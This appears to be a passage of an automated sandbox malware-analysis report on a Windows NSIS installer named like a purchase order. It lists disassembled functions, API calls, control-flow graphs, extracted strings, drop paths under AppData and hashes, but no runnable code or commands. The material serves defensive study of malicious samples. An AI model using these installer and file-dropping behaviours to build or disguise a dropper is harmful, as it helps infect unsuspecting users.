                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: "C:\Users\user\Desktop\PO2737478834ORDER.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf$Control Panel\Desktop\ResourceLocale$Exec$Ramplor Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                        • API String ID: 1975747703-2662491070
                                                        • Opcode ID: c9078dae625b6f4b5fdad37e38e1f8e9c4a43360c011d7f7777f28fc6933afc9
                                                        • Instruction ID: 8119f10372a92e3ad89c0c28339df669361e1c2b2a074a7ad4fa5a04607ec86b
                                                        • Opcode Fuzzy Hash: c9078dae625b6f4b5fdad37e38e1f8e9c4a43360c011d7f7777f28fc6933afc9
                                                        • Instruction Fuzzy Hash: CC61B4703402446ED620AF65AD45F3B3AACEB8574AF40053FF991B62E3CB7D5D029A2D

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 491 402ea1-402eef GetTickCount GetModuleFileNameA call 405c5a 494 402ef1-402ef6 491->494 495 402efb-402f29 call 4060c1 call 405aa0 call 4060c1 GetFileSize 491->495 496 4030d1-4030d5 494->496 503 403014-403022 call 402e3d 495->503 504 402f2f 495->504 511 403024-403027 503->511 512 403077-40307c 503->512 506 402f34-402f4b 504->506 508 402f4d 506->508 509 402f4f-402f58 call 4032b4 506->509 508->509 516 40307e-403086 call 402e3d 509->516 517 402f5e-402f65 509->517 514 403029-403041 call 4032ca call 4032b4 511->514 515 40304b-403075 GlobalAlloc call 4032ca call 4030d8 511->515 512->496 514->512 537 403043-403049 514->537 515->512 542 403088-403099 515->542 516->512 521 402fe1-402fe5 517->521 522 402f67-402f7b call 405c15 517->522 526 402fe7-402fee call 402e3d 521->526 527 402fef-402ff5 521->527 522->527 540 402f7d-402f84 522->540 526->527 533 403004-40300c 527->533 534 402ff7-403001 call 406581 527->534 533->506 541 403012 533->541 534->533 537->512 537->515 540->527 544 402f86-402f8d 540->544 541->503 545 4030a1-4030a6 542->545 546 40309b 542->546 544->527 548 402f8f-402f96 544->548 547 4030a7-4030ad 545->547 546->545 547->547 549 4030af-4030ca SetFilePointer call 405c15 547->549 548->527 550 402f98-402f9f 548->550 553 4030cf 549->553 550->527 552 402fa1-402fc1 550->552 552->512 554 402fc7-402fcb 552->554 553->496 555 402fd3-402fdb 554->555 556 402fcd-402fd1 554->556 555->527 557 402fdd-402fdf 555->557 556->541 556->555 557->527
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00402EB2
                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\PO2737478834ORDER.exe,00000400), ref: 00402ECE
                                                          • Part of subcall function 00405C5A: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\PO2737478834ORDER.exe,80000000,00000003), ref: 00405C5E
                                                          • Part of subcall function 00405C5A: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C80
                                                        • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO2737478834ORDER.exe,C:\Users\user\Desktop\PO2737478834ORDER.exe,80000000,00000003), ref: 00402F1A
                                                        • GlobalAlloc.KERNEL32(00000040,00000020), ref: 00403050
                                                        Strings
                                                        • C:\Users\user\Desktop\PO2737478834ORDER.exe, xrefs: 00402EB8, 00402EC7, 00402EDB, 00402EFB
                                                        • soft, xrefs: 00402F8F
                                                        • "C:\Users\user\Desktop\PO2737478834ORDER.exe", xrefs: 00402EA1
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EA8
                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403077
                                                        • C:\Users\user\Desktop, xrefs: 00402EFC, 00402F01, 00402F07
                                                        • Null, xrefs: 00402F98
                                                        • Inst, xrefs: 00402F86
                                                        • Error launching installer, xrefs: 00402EF1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                        • String ID: "C:\Users\user\Desktop\PO2737478834ORDER.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PO2737478834ORDER.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                        • API String ID: 2803837635-82937607
                                                        • Opcode ID: 1fdbf8666ac545bea4b4f259f72344d0a52c8dbd42631ed96dcafa73090d8d3a
                                                        • Instruction ID: 301210c85c1c672c97290be40cd2ab013445f980247fce5a821d6afddb5369d2
                                                        • Opcode Fuzzy Hash: 1fdbf8666ac545bea4b4f259f72344d0a52c8dbd42631ed96dcafa73090d8d3a
                                                        • Instruction Fuzzy Hash: 8851C171A01204ABDF20AF65DD85BAE7FB8EB40369F11413BF504B22D5C7789E818B9D

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 558 406154-40615f 559 406161-406170 558->559 560 406172-406188 558->560 559->560 561 406379-40637d 560->561 562 40618e-406199 560->562 563 406383-40638d 561->563 564 4061ab-4061b5 561->564 562->561 565 40619f-4061a6 562->565 566 406398-406399 563->566 567 40638f-406393 call 4060c1 563->567 564->563 568 4061bb-4061c2 564->568 565->561 567->566 569 4061c8-4061fc 568->569 570 40636c 568->570 572 406202-40620c 569->572 573 406319-40631c 569->573 574 406376-406378 570->574 575 40636e-406374 570->575 576 406226 572->576 577 40620e-406212 572->577 578 40634c-40634f 573->578 579 40631e-406321 573->579 574->561 575->561 583 40622d-406234 576->583 577->576 580 406214-406218 577->580 584 406351-406358 call 406154 578->584 585 40635d-40636a lstrlenA 578->585 581 406331-40633d call 4060c1 579->581 582 406323-40632f call 40601f 579->582 580->576 586 40621a-40621e 580->586 596 406342-406348 581->596 582->596 588 406236-406238 583->588 589 406239-40623b 583->589 584->585 585->561 586->576 592 406220-406224 586->592 588->589 594 406274-406277 589->594 595 40623d-406260 call 405fa8 589->595 592->583 597 406287-40628a 594->597 598 406279-406285 GetSystemDirectoryA 594->598 608 406300-406304 595->608 609 406266-40626f call 406154 595->609 596->585 600 40634a 596->600 602 4062f7-4062f9 597->602 603 40628c-40629a GetWindowsDirectoryA 597->603 601 4062fb-4062fe 598->601 605 406311-406317 call 40639c 600->605 601->605 601->608 602->601 607 40629c-4062a6 602->607 603->602 605->585 611 4062c0-4062d6 SHGetSpecialFolderLocation 607->611 612 4062a8-4062ab 607->612 608->605 614 406306-40630c lstrcatA 608->614 609->601 616 4062f4 611->616 617 4062d8-4062f2 SHGetPathFromIDListA CoTaskMemFree 611->617 612->611 615 4062ad-4062b4 612->615 614->605 619 4062bc-4062be 615->619 616->602 617->601 617->616 619->601 619->611
                                                        APIs
                                                        • GetSystemDirectoryA.KERNEL32(Exec,00000400), ref: 0040627F
                                                        • GetWindowsDirectoryA.KERNEL32(Exec,00000400,?,Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll,00000000,00405220,Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll,00000000), ref: 00406292
                                                        • SHGetSpecialFolderLocation.SHELL32(00405220,00000000,?,Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll,00000000,00405220,Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll,00000000), ref: 004062CE
                                                        • SHGetPathFromIDListA.SHELL32(00000000,Exec), ref: 004062DC
                                                        • CoTaskMemFree.OLE32(00000000), ref: 004062E8
                                                        • lstrcatA.KERNEL32(Exec,\Microsoft\Internet Explorer\Quick Launch), ref: 0040630C
                                                        • lstrlenA.KERNEL32(Exec,?,Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll,00000000,00405220,Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll,00000000,00000000,004178E0,00000000), ref: 0040635E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                        • String ID: Exec$Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                        • API String ID: 717251189-3184312192
                                                        • Opcode ID: b9f03b5936b094526a68e4ab87593b997b03d55e1f088675cc754777caf79d28
                                                        • Instruction ID: 8fbc972aa6bd3719c406fe4e3ec738975147f7369702dd1472e60f0af39698f0
                                                        • Opcode Fuzzy Hash: b9f03b5936b094526a68e4ab87593b997b03d55e1f088675cc754777caf79d28
                                                        • Instruction Fuzzy Hash: 31610671900111AADF20AF65DC84BBE3BA4AB46310F12417FE953B62D1C73C49A2CB9D

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 689 4030d8-4030ec 690 4030f5-4030fd 689->690 691 4030ee 689->691 692 403104-403109 690->692 693 4030ff 690->693 691->690 694 403119-403126 call 4032b4 692->694 695 40310b-403114 call 4032ca 692->695 693->692 699 40326b 694->699 700 40312c-403130 694->700 695->694 703 40326d-40326e 699->703 701 403254-403256 700->701 702 403136-403156 GetTickCount call 4065ef 700->702 704 403258-40325b 701->704 705 40329f-4032a3 701->705 713 4032aa 702->713 715 40315c-403164 702->715 707 4032ad-4032b1 703->707 708 403260-403269 call 4032b4 704->708 709 40325d 704->709 710 403270-403276 705->710 711 4032a5 705->711 708->699 722 4032a7 708->722 709->708 716 403278 710->716 717 40327b-403289 call 4032b4 710->717 711->713 713->707 719 403166 715->719 720 403169-403177 call 4032b4 715->720 716->717 717->699 726 40328b-403297 call 405d01 717->726 719->720 720->699 727 40317d-403186 720->727 722->713 732 403250-403252 726->732 733 403299-40329c 726->733 729 40318c-4031a9 call 40660f 727->729 735 40324c-40324e 729->735 736 4031af-4031c6 GetTickCount 729->736 732->703 733->705 735->703 737 4031c8-4031d0 736->737 738 40320b-40320d 736->738 741 4031d2-4031d6 737->741 742 4031d8-403203 MulDiv wsprintfA call 4051e8 737->742 739 403240-403244 738->739 740 40320f-403213 738->740 739->715 746 40324a 739->746 744 403215-40321a call 405d01 740->744 745 403228-40322e 740->745 741->738 741->742 747 403208 742->747 750 40321f-403221 744->750 749 403234-403238 745->749 746->713 747->738 749->729 751 40323e 749->751 750->732 752 403223-403226 750->752 751->713 752->749
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: CountTick$wsprintf
                                                        • String ID: ... %d%%$8A$8A$xA$xA
                                                        • API String ID: 551687249-266981132
                                                        • Opcode ID: 2779a8c27ab4fa154f89a57db0462927349ddc59ff22a4c54c6aa2d2765dcfd2
                                                        • Instruction ID: 5859ff30484dbc6f12110d744d50748fce684291dc682ebadfc23bb097a10b04
                                                        • Opcode Fuzzy Hash: 2779a8c27ab4fa154f89a57db0462927349ddc59ff22a4c54c6aa2d2765dcfd2
                                                        • Instruction Fuzzy Hash: BA515E71900219ABCB10AF66D944A9F7BACEF44756F1481BFE810B72D1C738CA41CBAD

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 753 401759-40177c call 402bce call 405ac6 758 401786-401798 call 4060c1 call 405a59 lstrcatA 753->758 759 40177e-401784 call 4060c1 753->759 764 40179d-4017a3 call 40639c 758->764 759->764 769 4017a8-4017ac 764->769 770 4017ae-4017b8 call 406435 769->770 771 4017df-4017e2 769->771 779 4017ca-4017dc 770->779 780 4017ba-4017c8 CompareFileTime 770->780 772 4017e4-4017e5 call 405c35 771->772 773 4017ea-401806 call 405c5a 771->773 772->773 781 401808-40180b 773->781 782 40187e-4018a7 call 4051e8 call 4030d8 773->782 779->771 780->779 783 401860-40186a call 4051e8 781->783 784 40180d-40184f call 4060c1 * 2 call 406154 call 4060c1 call 4057dd 781->784 794 4018a9-4018ad 782->794 795 4018af-4018bb SetFileTime 782->795 796 401873-401879 783->796 784->769 816 401855-401856 784->816 794->795 798 4018c1-4018cc FindCloseChangeNotification 794->798 795->798 799 402a63 796->799 801 4018d2-4018d5 798->801 802 402a5a-402a5d 798->802 803 402a65-402a69 799->803 805 4018d7-4018e8 call 406154 lstrcatA 801->805 806 4018ea-4018ed call 406154 801->806 802->799 813 4018f2-40238c call 4057dd 805->813 806->813 813->802 813->803 816->796 818 401858-401859 816->818 818->783
                                                        APIs
                                                        • lstrcatA.KERNEL32(00000000,00000000,Exec,C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Berni72,00000000,00000000,00000031), ref: 00401798
                                                        • CompareFileTime.KERNEL32(-00000014,?,Exec,Exec,00000000,00000000,Exec,C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Berni72,00000000,00000000,00000031), ref: 004017C2
                                                          • Part of subcall function 004060C1: lstrcpynA.KERNEL32(?,?,00000400,004033E4,00423F20,NSIS Error,?,00000007,00000009,0000000B), ref: 004060CE
                                                          • Part of subcall function 004051E8: lstrlenA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll,00000000,004178E0,00000000,?,?,?,?,?,?,?,?,?,00403208,00000000,?), ref: 00405221
                                                          • Part of subcall function 004051E8: lstrlenA.KERNEL32(00403208,Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll,00000000,004178E0,00000000,?,?,?,?,?,?,?,?,?,00403208,00000000), ref: 00405231
                                                          • Part of subcall function 004051E8: lstrcatA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll,00403208,00403208,Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll,00000000,004178E0,00000000), ref: 00405244
                                                          • Part of subcall function 004051E8: SetWindowTextA.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll), ref: 00405256
                                                          • Part of subcall function 004051E8: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040527C
                                                          • Part of subcall function 004051E8: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405296
                                                          • Part of subcall function 004051E8: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052A4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Berni72$Exec
                                                        • API String ID: 1941528284-1112528712
                                                        • Opcode ID: 2476305132f036933cb377fb0227cb92ca1979367da5a6612f823a9c05f9f285
                                                        • Instruction ID: ad8319ac8819e3f4f0647767249a41d8ee4e375b3a8deda6b30fbb54af0d7a5d
                                                        • Opcode Fuzzy Hash: 2476305132f036933cb377fb0227cb92ca1979367da5a6612f823a9c05f9f285
                                                        • Instruction Fuzzy Hash: D641B731900515BACF10BFA5CC45DAF3669EF45369B21423BF422B21E1CA7C8A528A6D

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 820 4051e8-4051fd 821 4052b3-4052b7 820->821 822 405203-405215 820->822 823 405220-40522c lstrlenA 822->823 824 405217-40521b call 406154 822->824 826 405249-40524d 823->826 827 40522e-40523e lstrlenA 823->827 824->823 828 40525c-405260 826->828 829 40524f-405256 SetWindowTextA 826->829 827->821 830 405240-405244 lstrcatA 827->830 831 405262-4052a4 SendMessageA * 3 828->831 832 4052a6-4052a8 828->832 829->828 830->826 831->832 832->821 833 4052aa-4052ad 832->833 833->821
                                                        APIs
                                                        • lstrlenA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll,00000000,004178E0,00000000,?,?,?,?,?,?,?,?,?,00403208,00000000,?), ref: 00405221
                                                        • lstrlenA.KERNEL32(00403208,Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll,00000000,004178E0,00000000,?,?,?,?,?,?,?,?,?,00403208,00000000), ref: 00405231
                                                        • lstrcatA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll,00403208,00403208,Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll,00000000,004178E0,00000000), ref: 00405244
                                                        • SetWindowTextA.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll), ref: 00405256
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040527C
                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405296
                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052A4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                        • String ID: Extract: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll
                                                        • API String ID: 2531174081-950017839
                                                        • Opcode ID: f27698f2302dc729cc4947e7290bf36b72ac2c2b5ce3f33cd80fa01ec77ea105
                                                        • Instruction ID: 13bf9d5a188301c634d68c5bb2c809f87baf544d33da629d3068cd84ff66c9cb
                                                        • Opcode Fuzzy Hash: f27698f2302dc729cc4947e7290bf36b72ac2c2b5ce3f33cd80fa01ec77ea105
                                                        • Instruction Fuzzy Hash: 7F218C71E00518BBDB119FA5DD81A9EBFB9EF09354F14807AF544B6290C7798A808F98

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 834 4056ae-4056f9 CreateDirectoryA 835 4056fb-4056fd 834->835 836 4056ff-40570c GetLastError 834->836 837 405726-405728 835->837 836->837 838 40570e-405722 SetFileSecurityA 836->838 838->835 839 405724 GetLastError 838->839 839->837
                                                        APIs
                                                        • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056F1
                                                        • GetLastError.KERNEL32 ref: 00405705
                                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040571A
                                                        • GetLastError.KERNEL32 ref: 00405724
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004056D4
                                                        • C:\Users\user\Desktop, xrefs: 004056AE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267872417.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO2737478834ORDER.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                        • API String ID: 3449924974-3530169944
                                                        • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                        • Instruction ID: 8fda383858cfa3d81fea8572b973588b51770532f266deb4a47d6cf866d68d21
                                                        • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                        • Instruction Fuzzy Hash: 5E010871C00219EADF009BA0D944BEFBBB4EB04354F00403AD545B6190EB799648DF99

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 840 40645c-40647c GetSystemDirectoryA 841 406480-406482 840->841 842 40647e 840->842 843 406492-406494 841->843 844 406484-40648c 841->844 842->841 846 406495-4064c7 wsprintfA LoadLibraryExA 843->846 844->843 845 40648e-406490 844->845 845->846
                                                        APIs
                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406473
                                                        • wsprintfA.USER32 ref: 004064AC
                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064C0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1267094890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1267026802.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267148028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1267299542.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
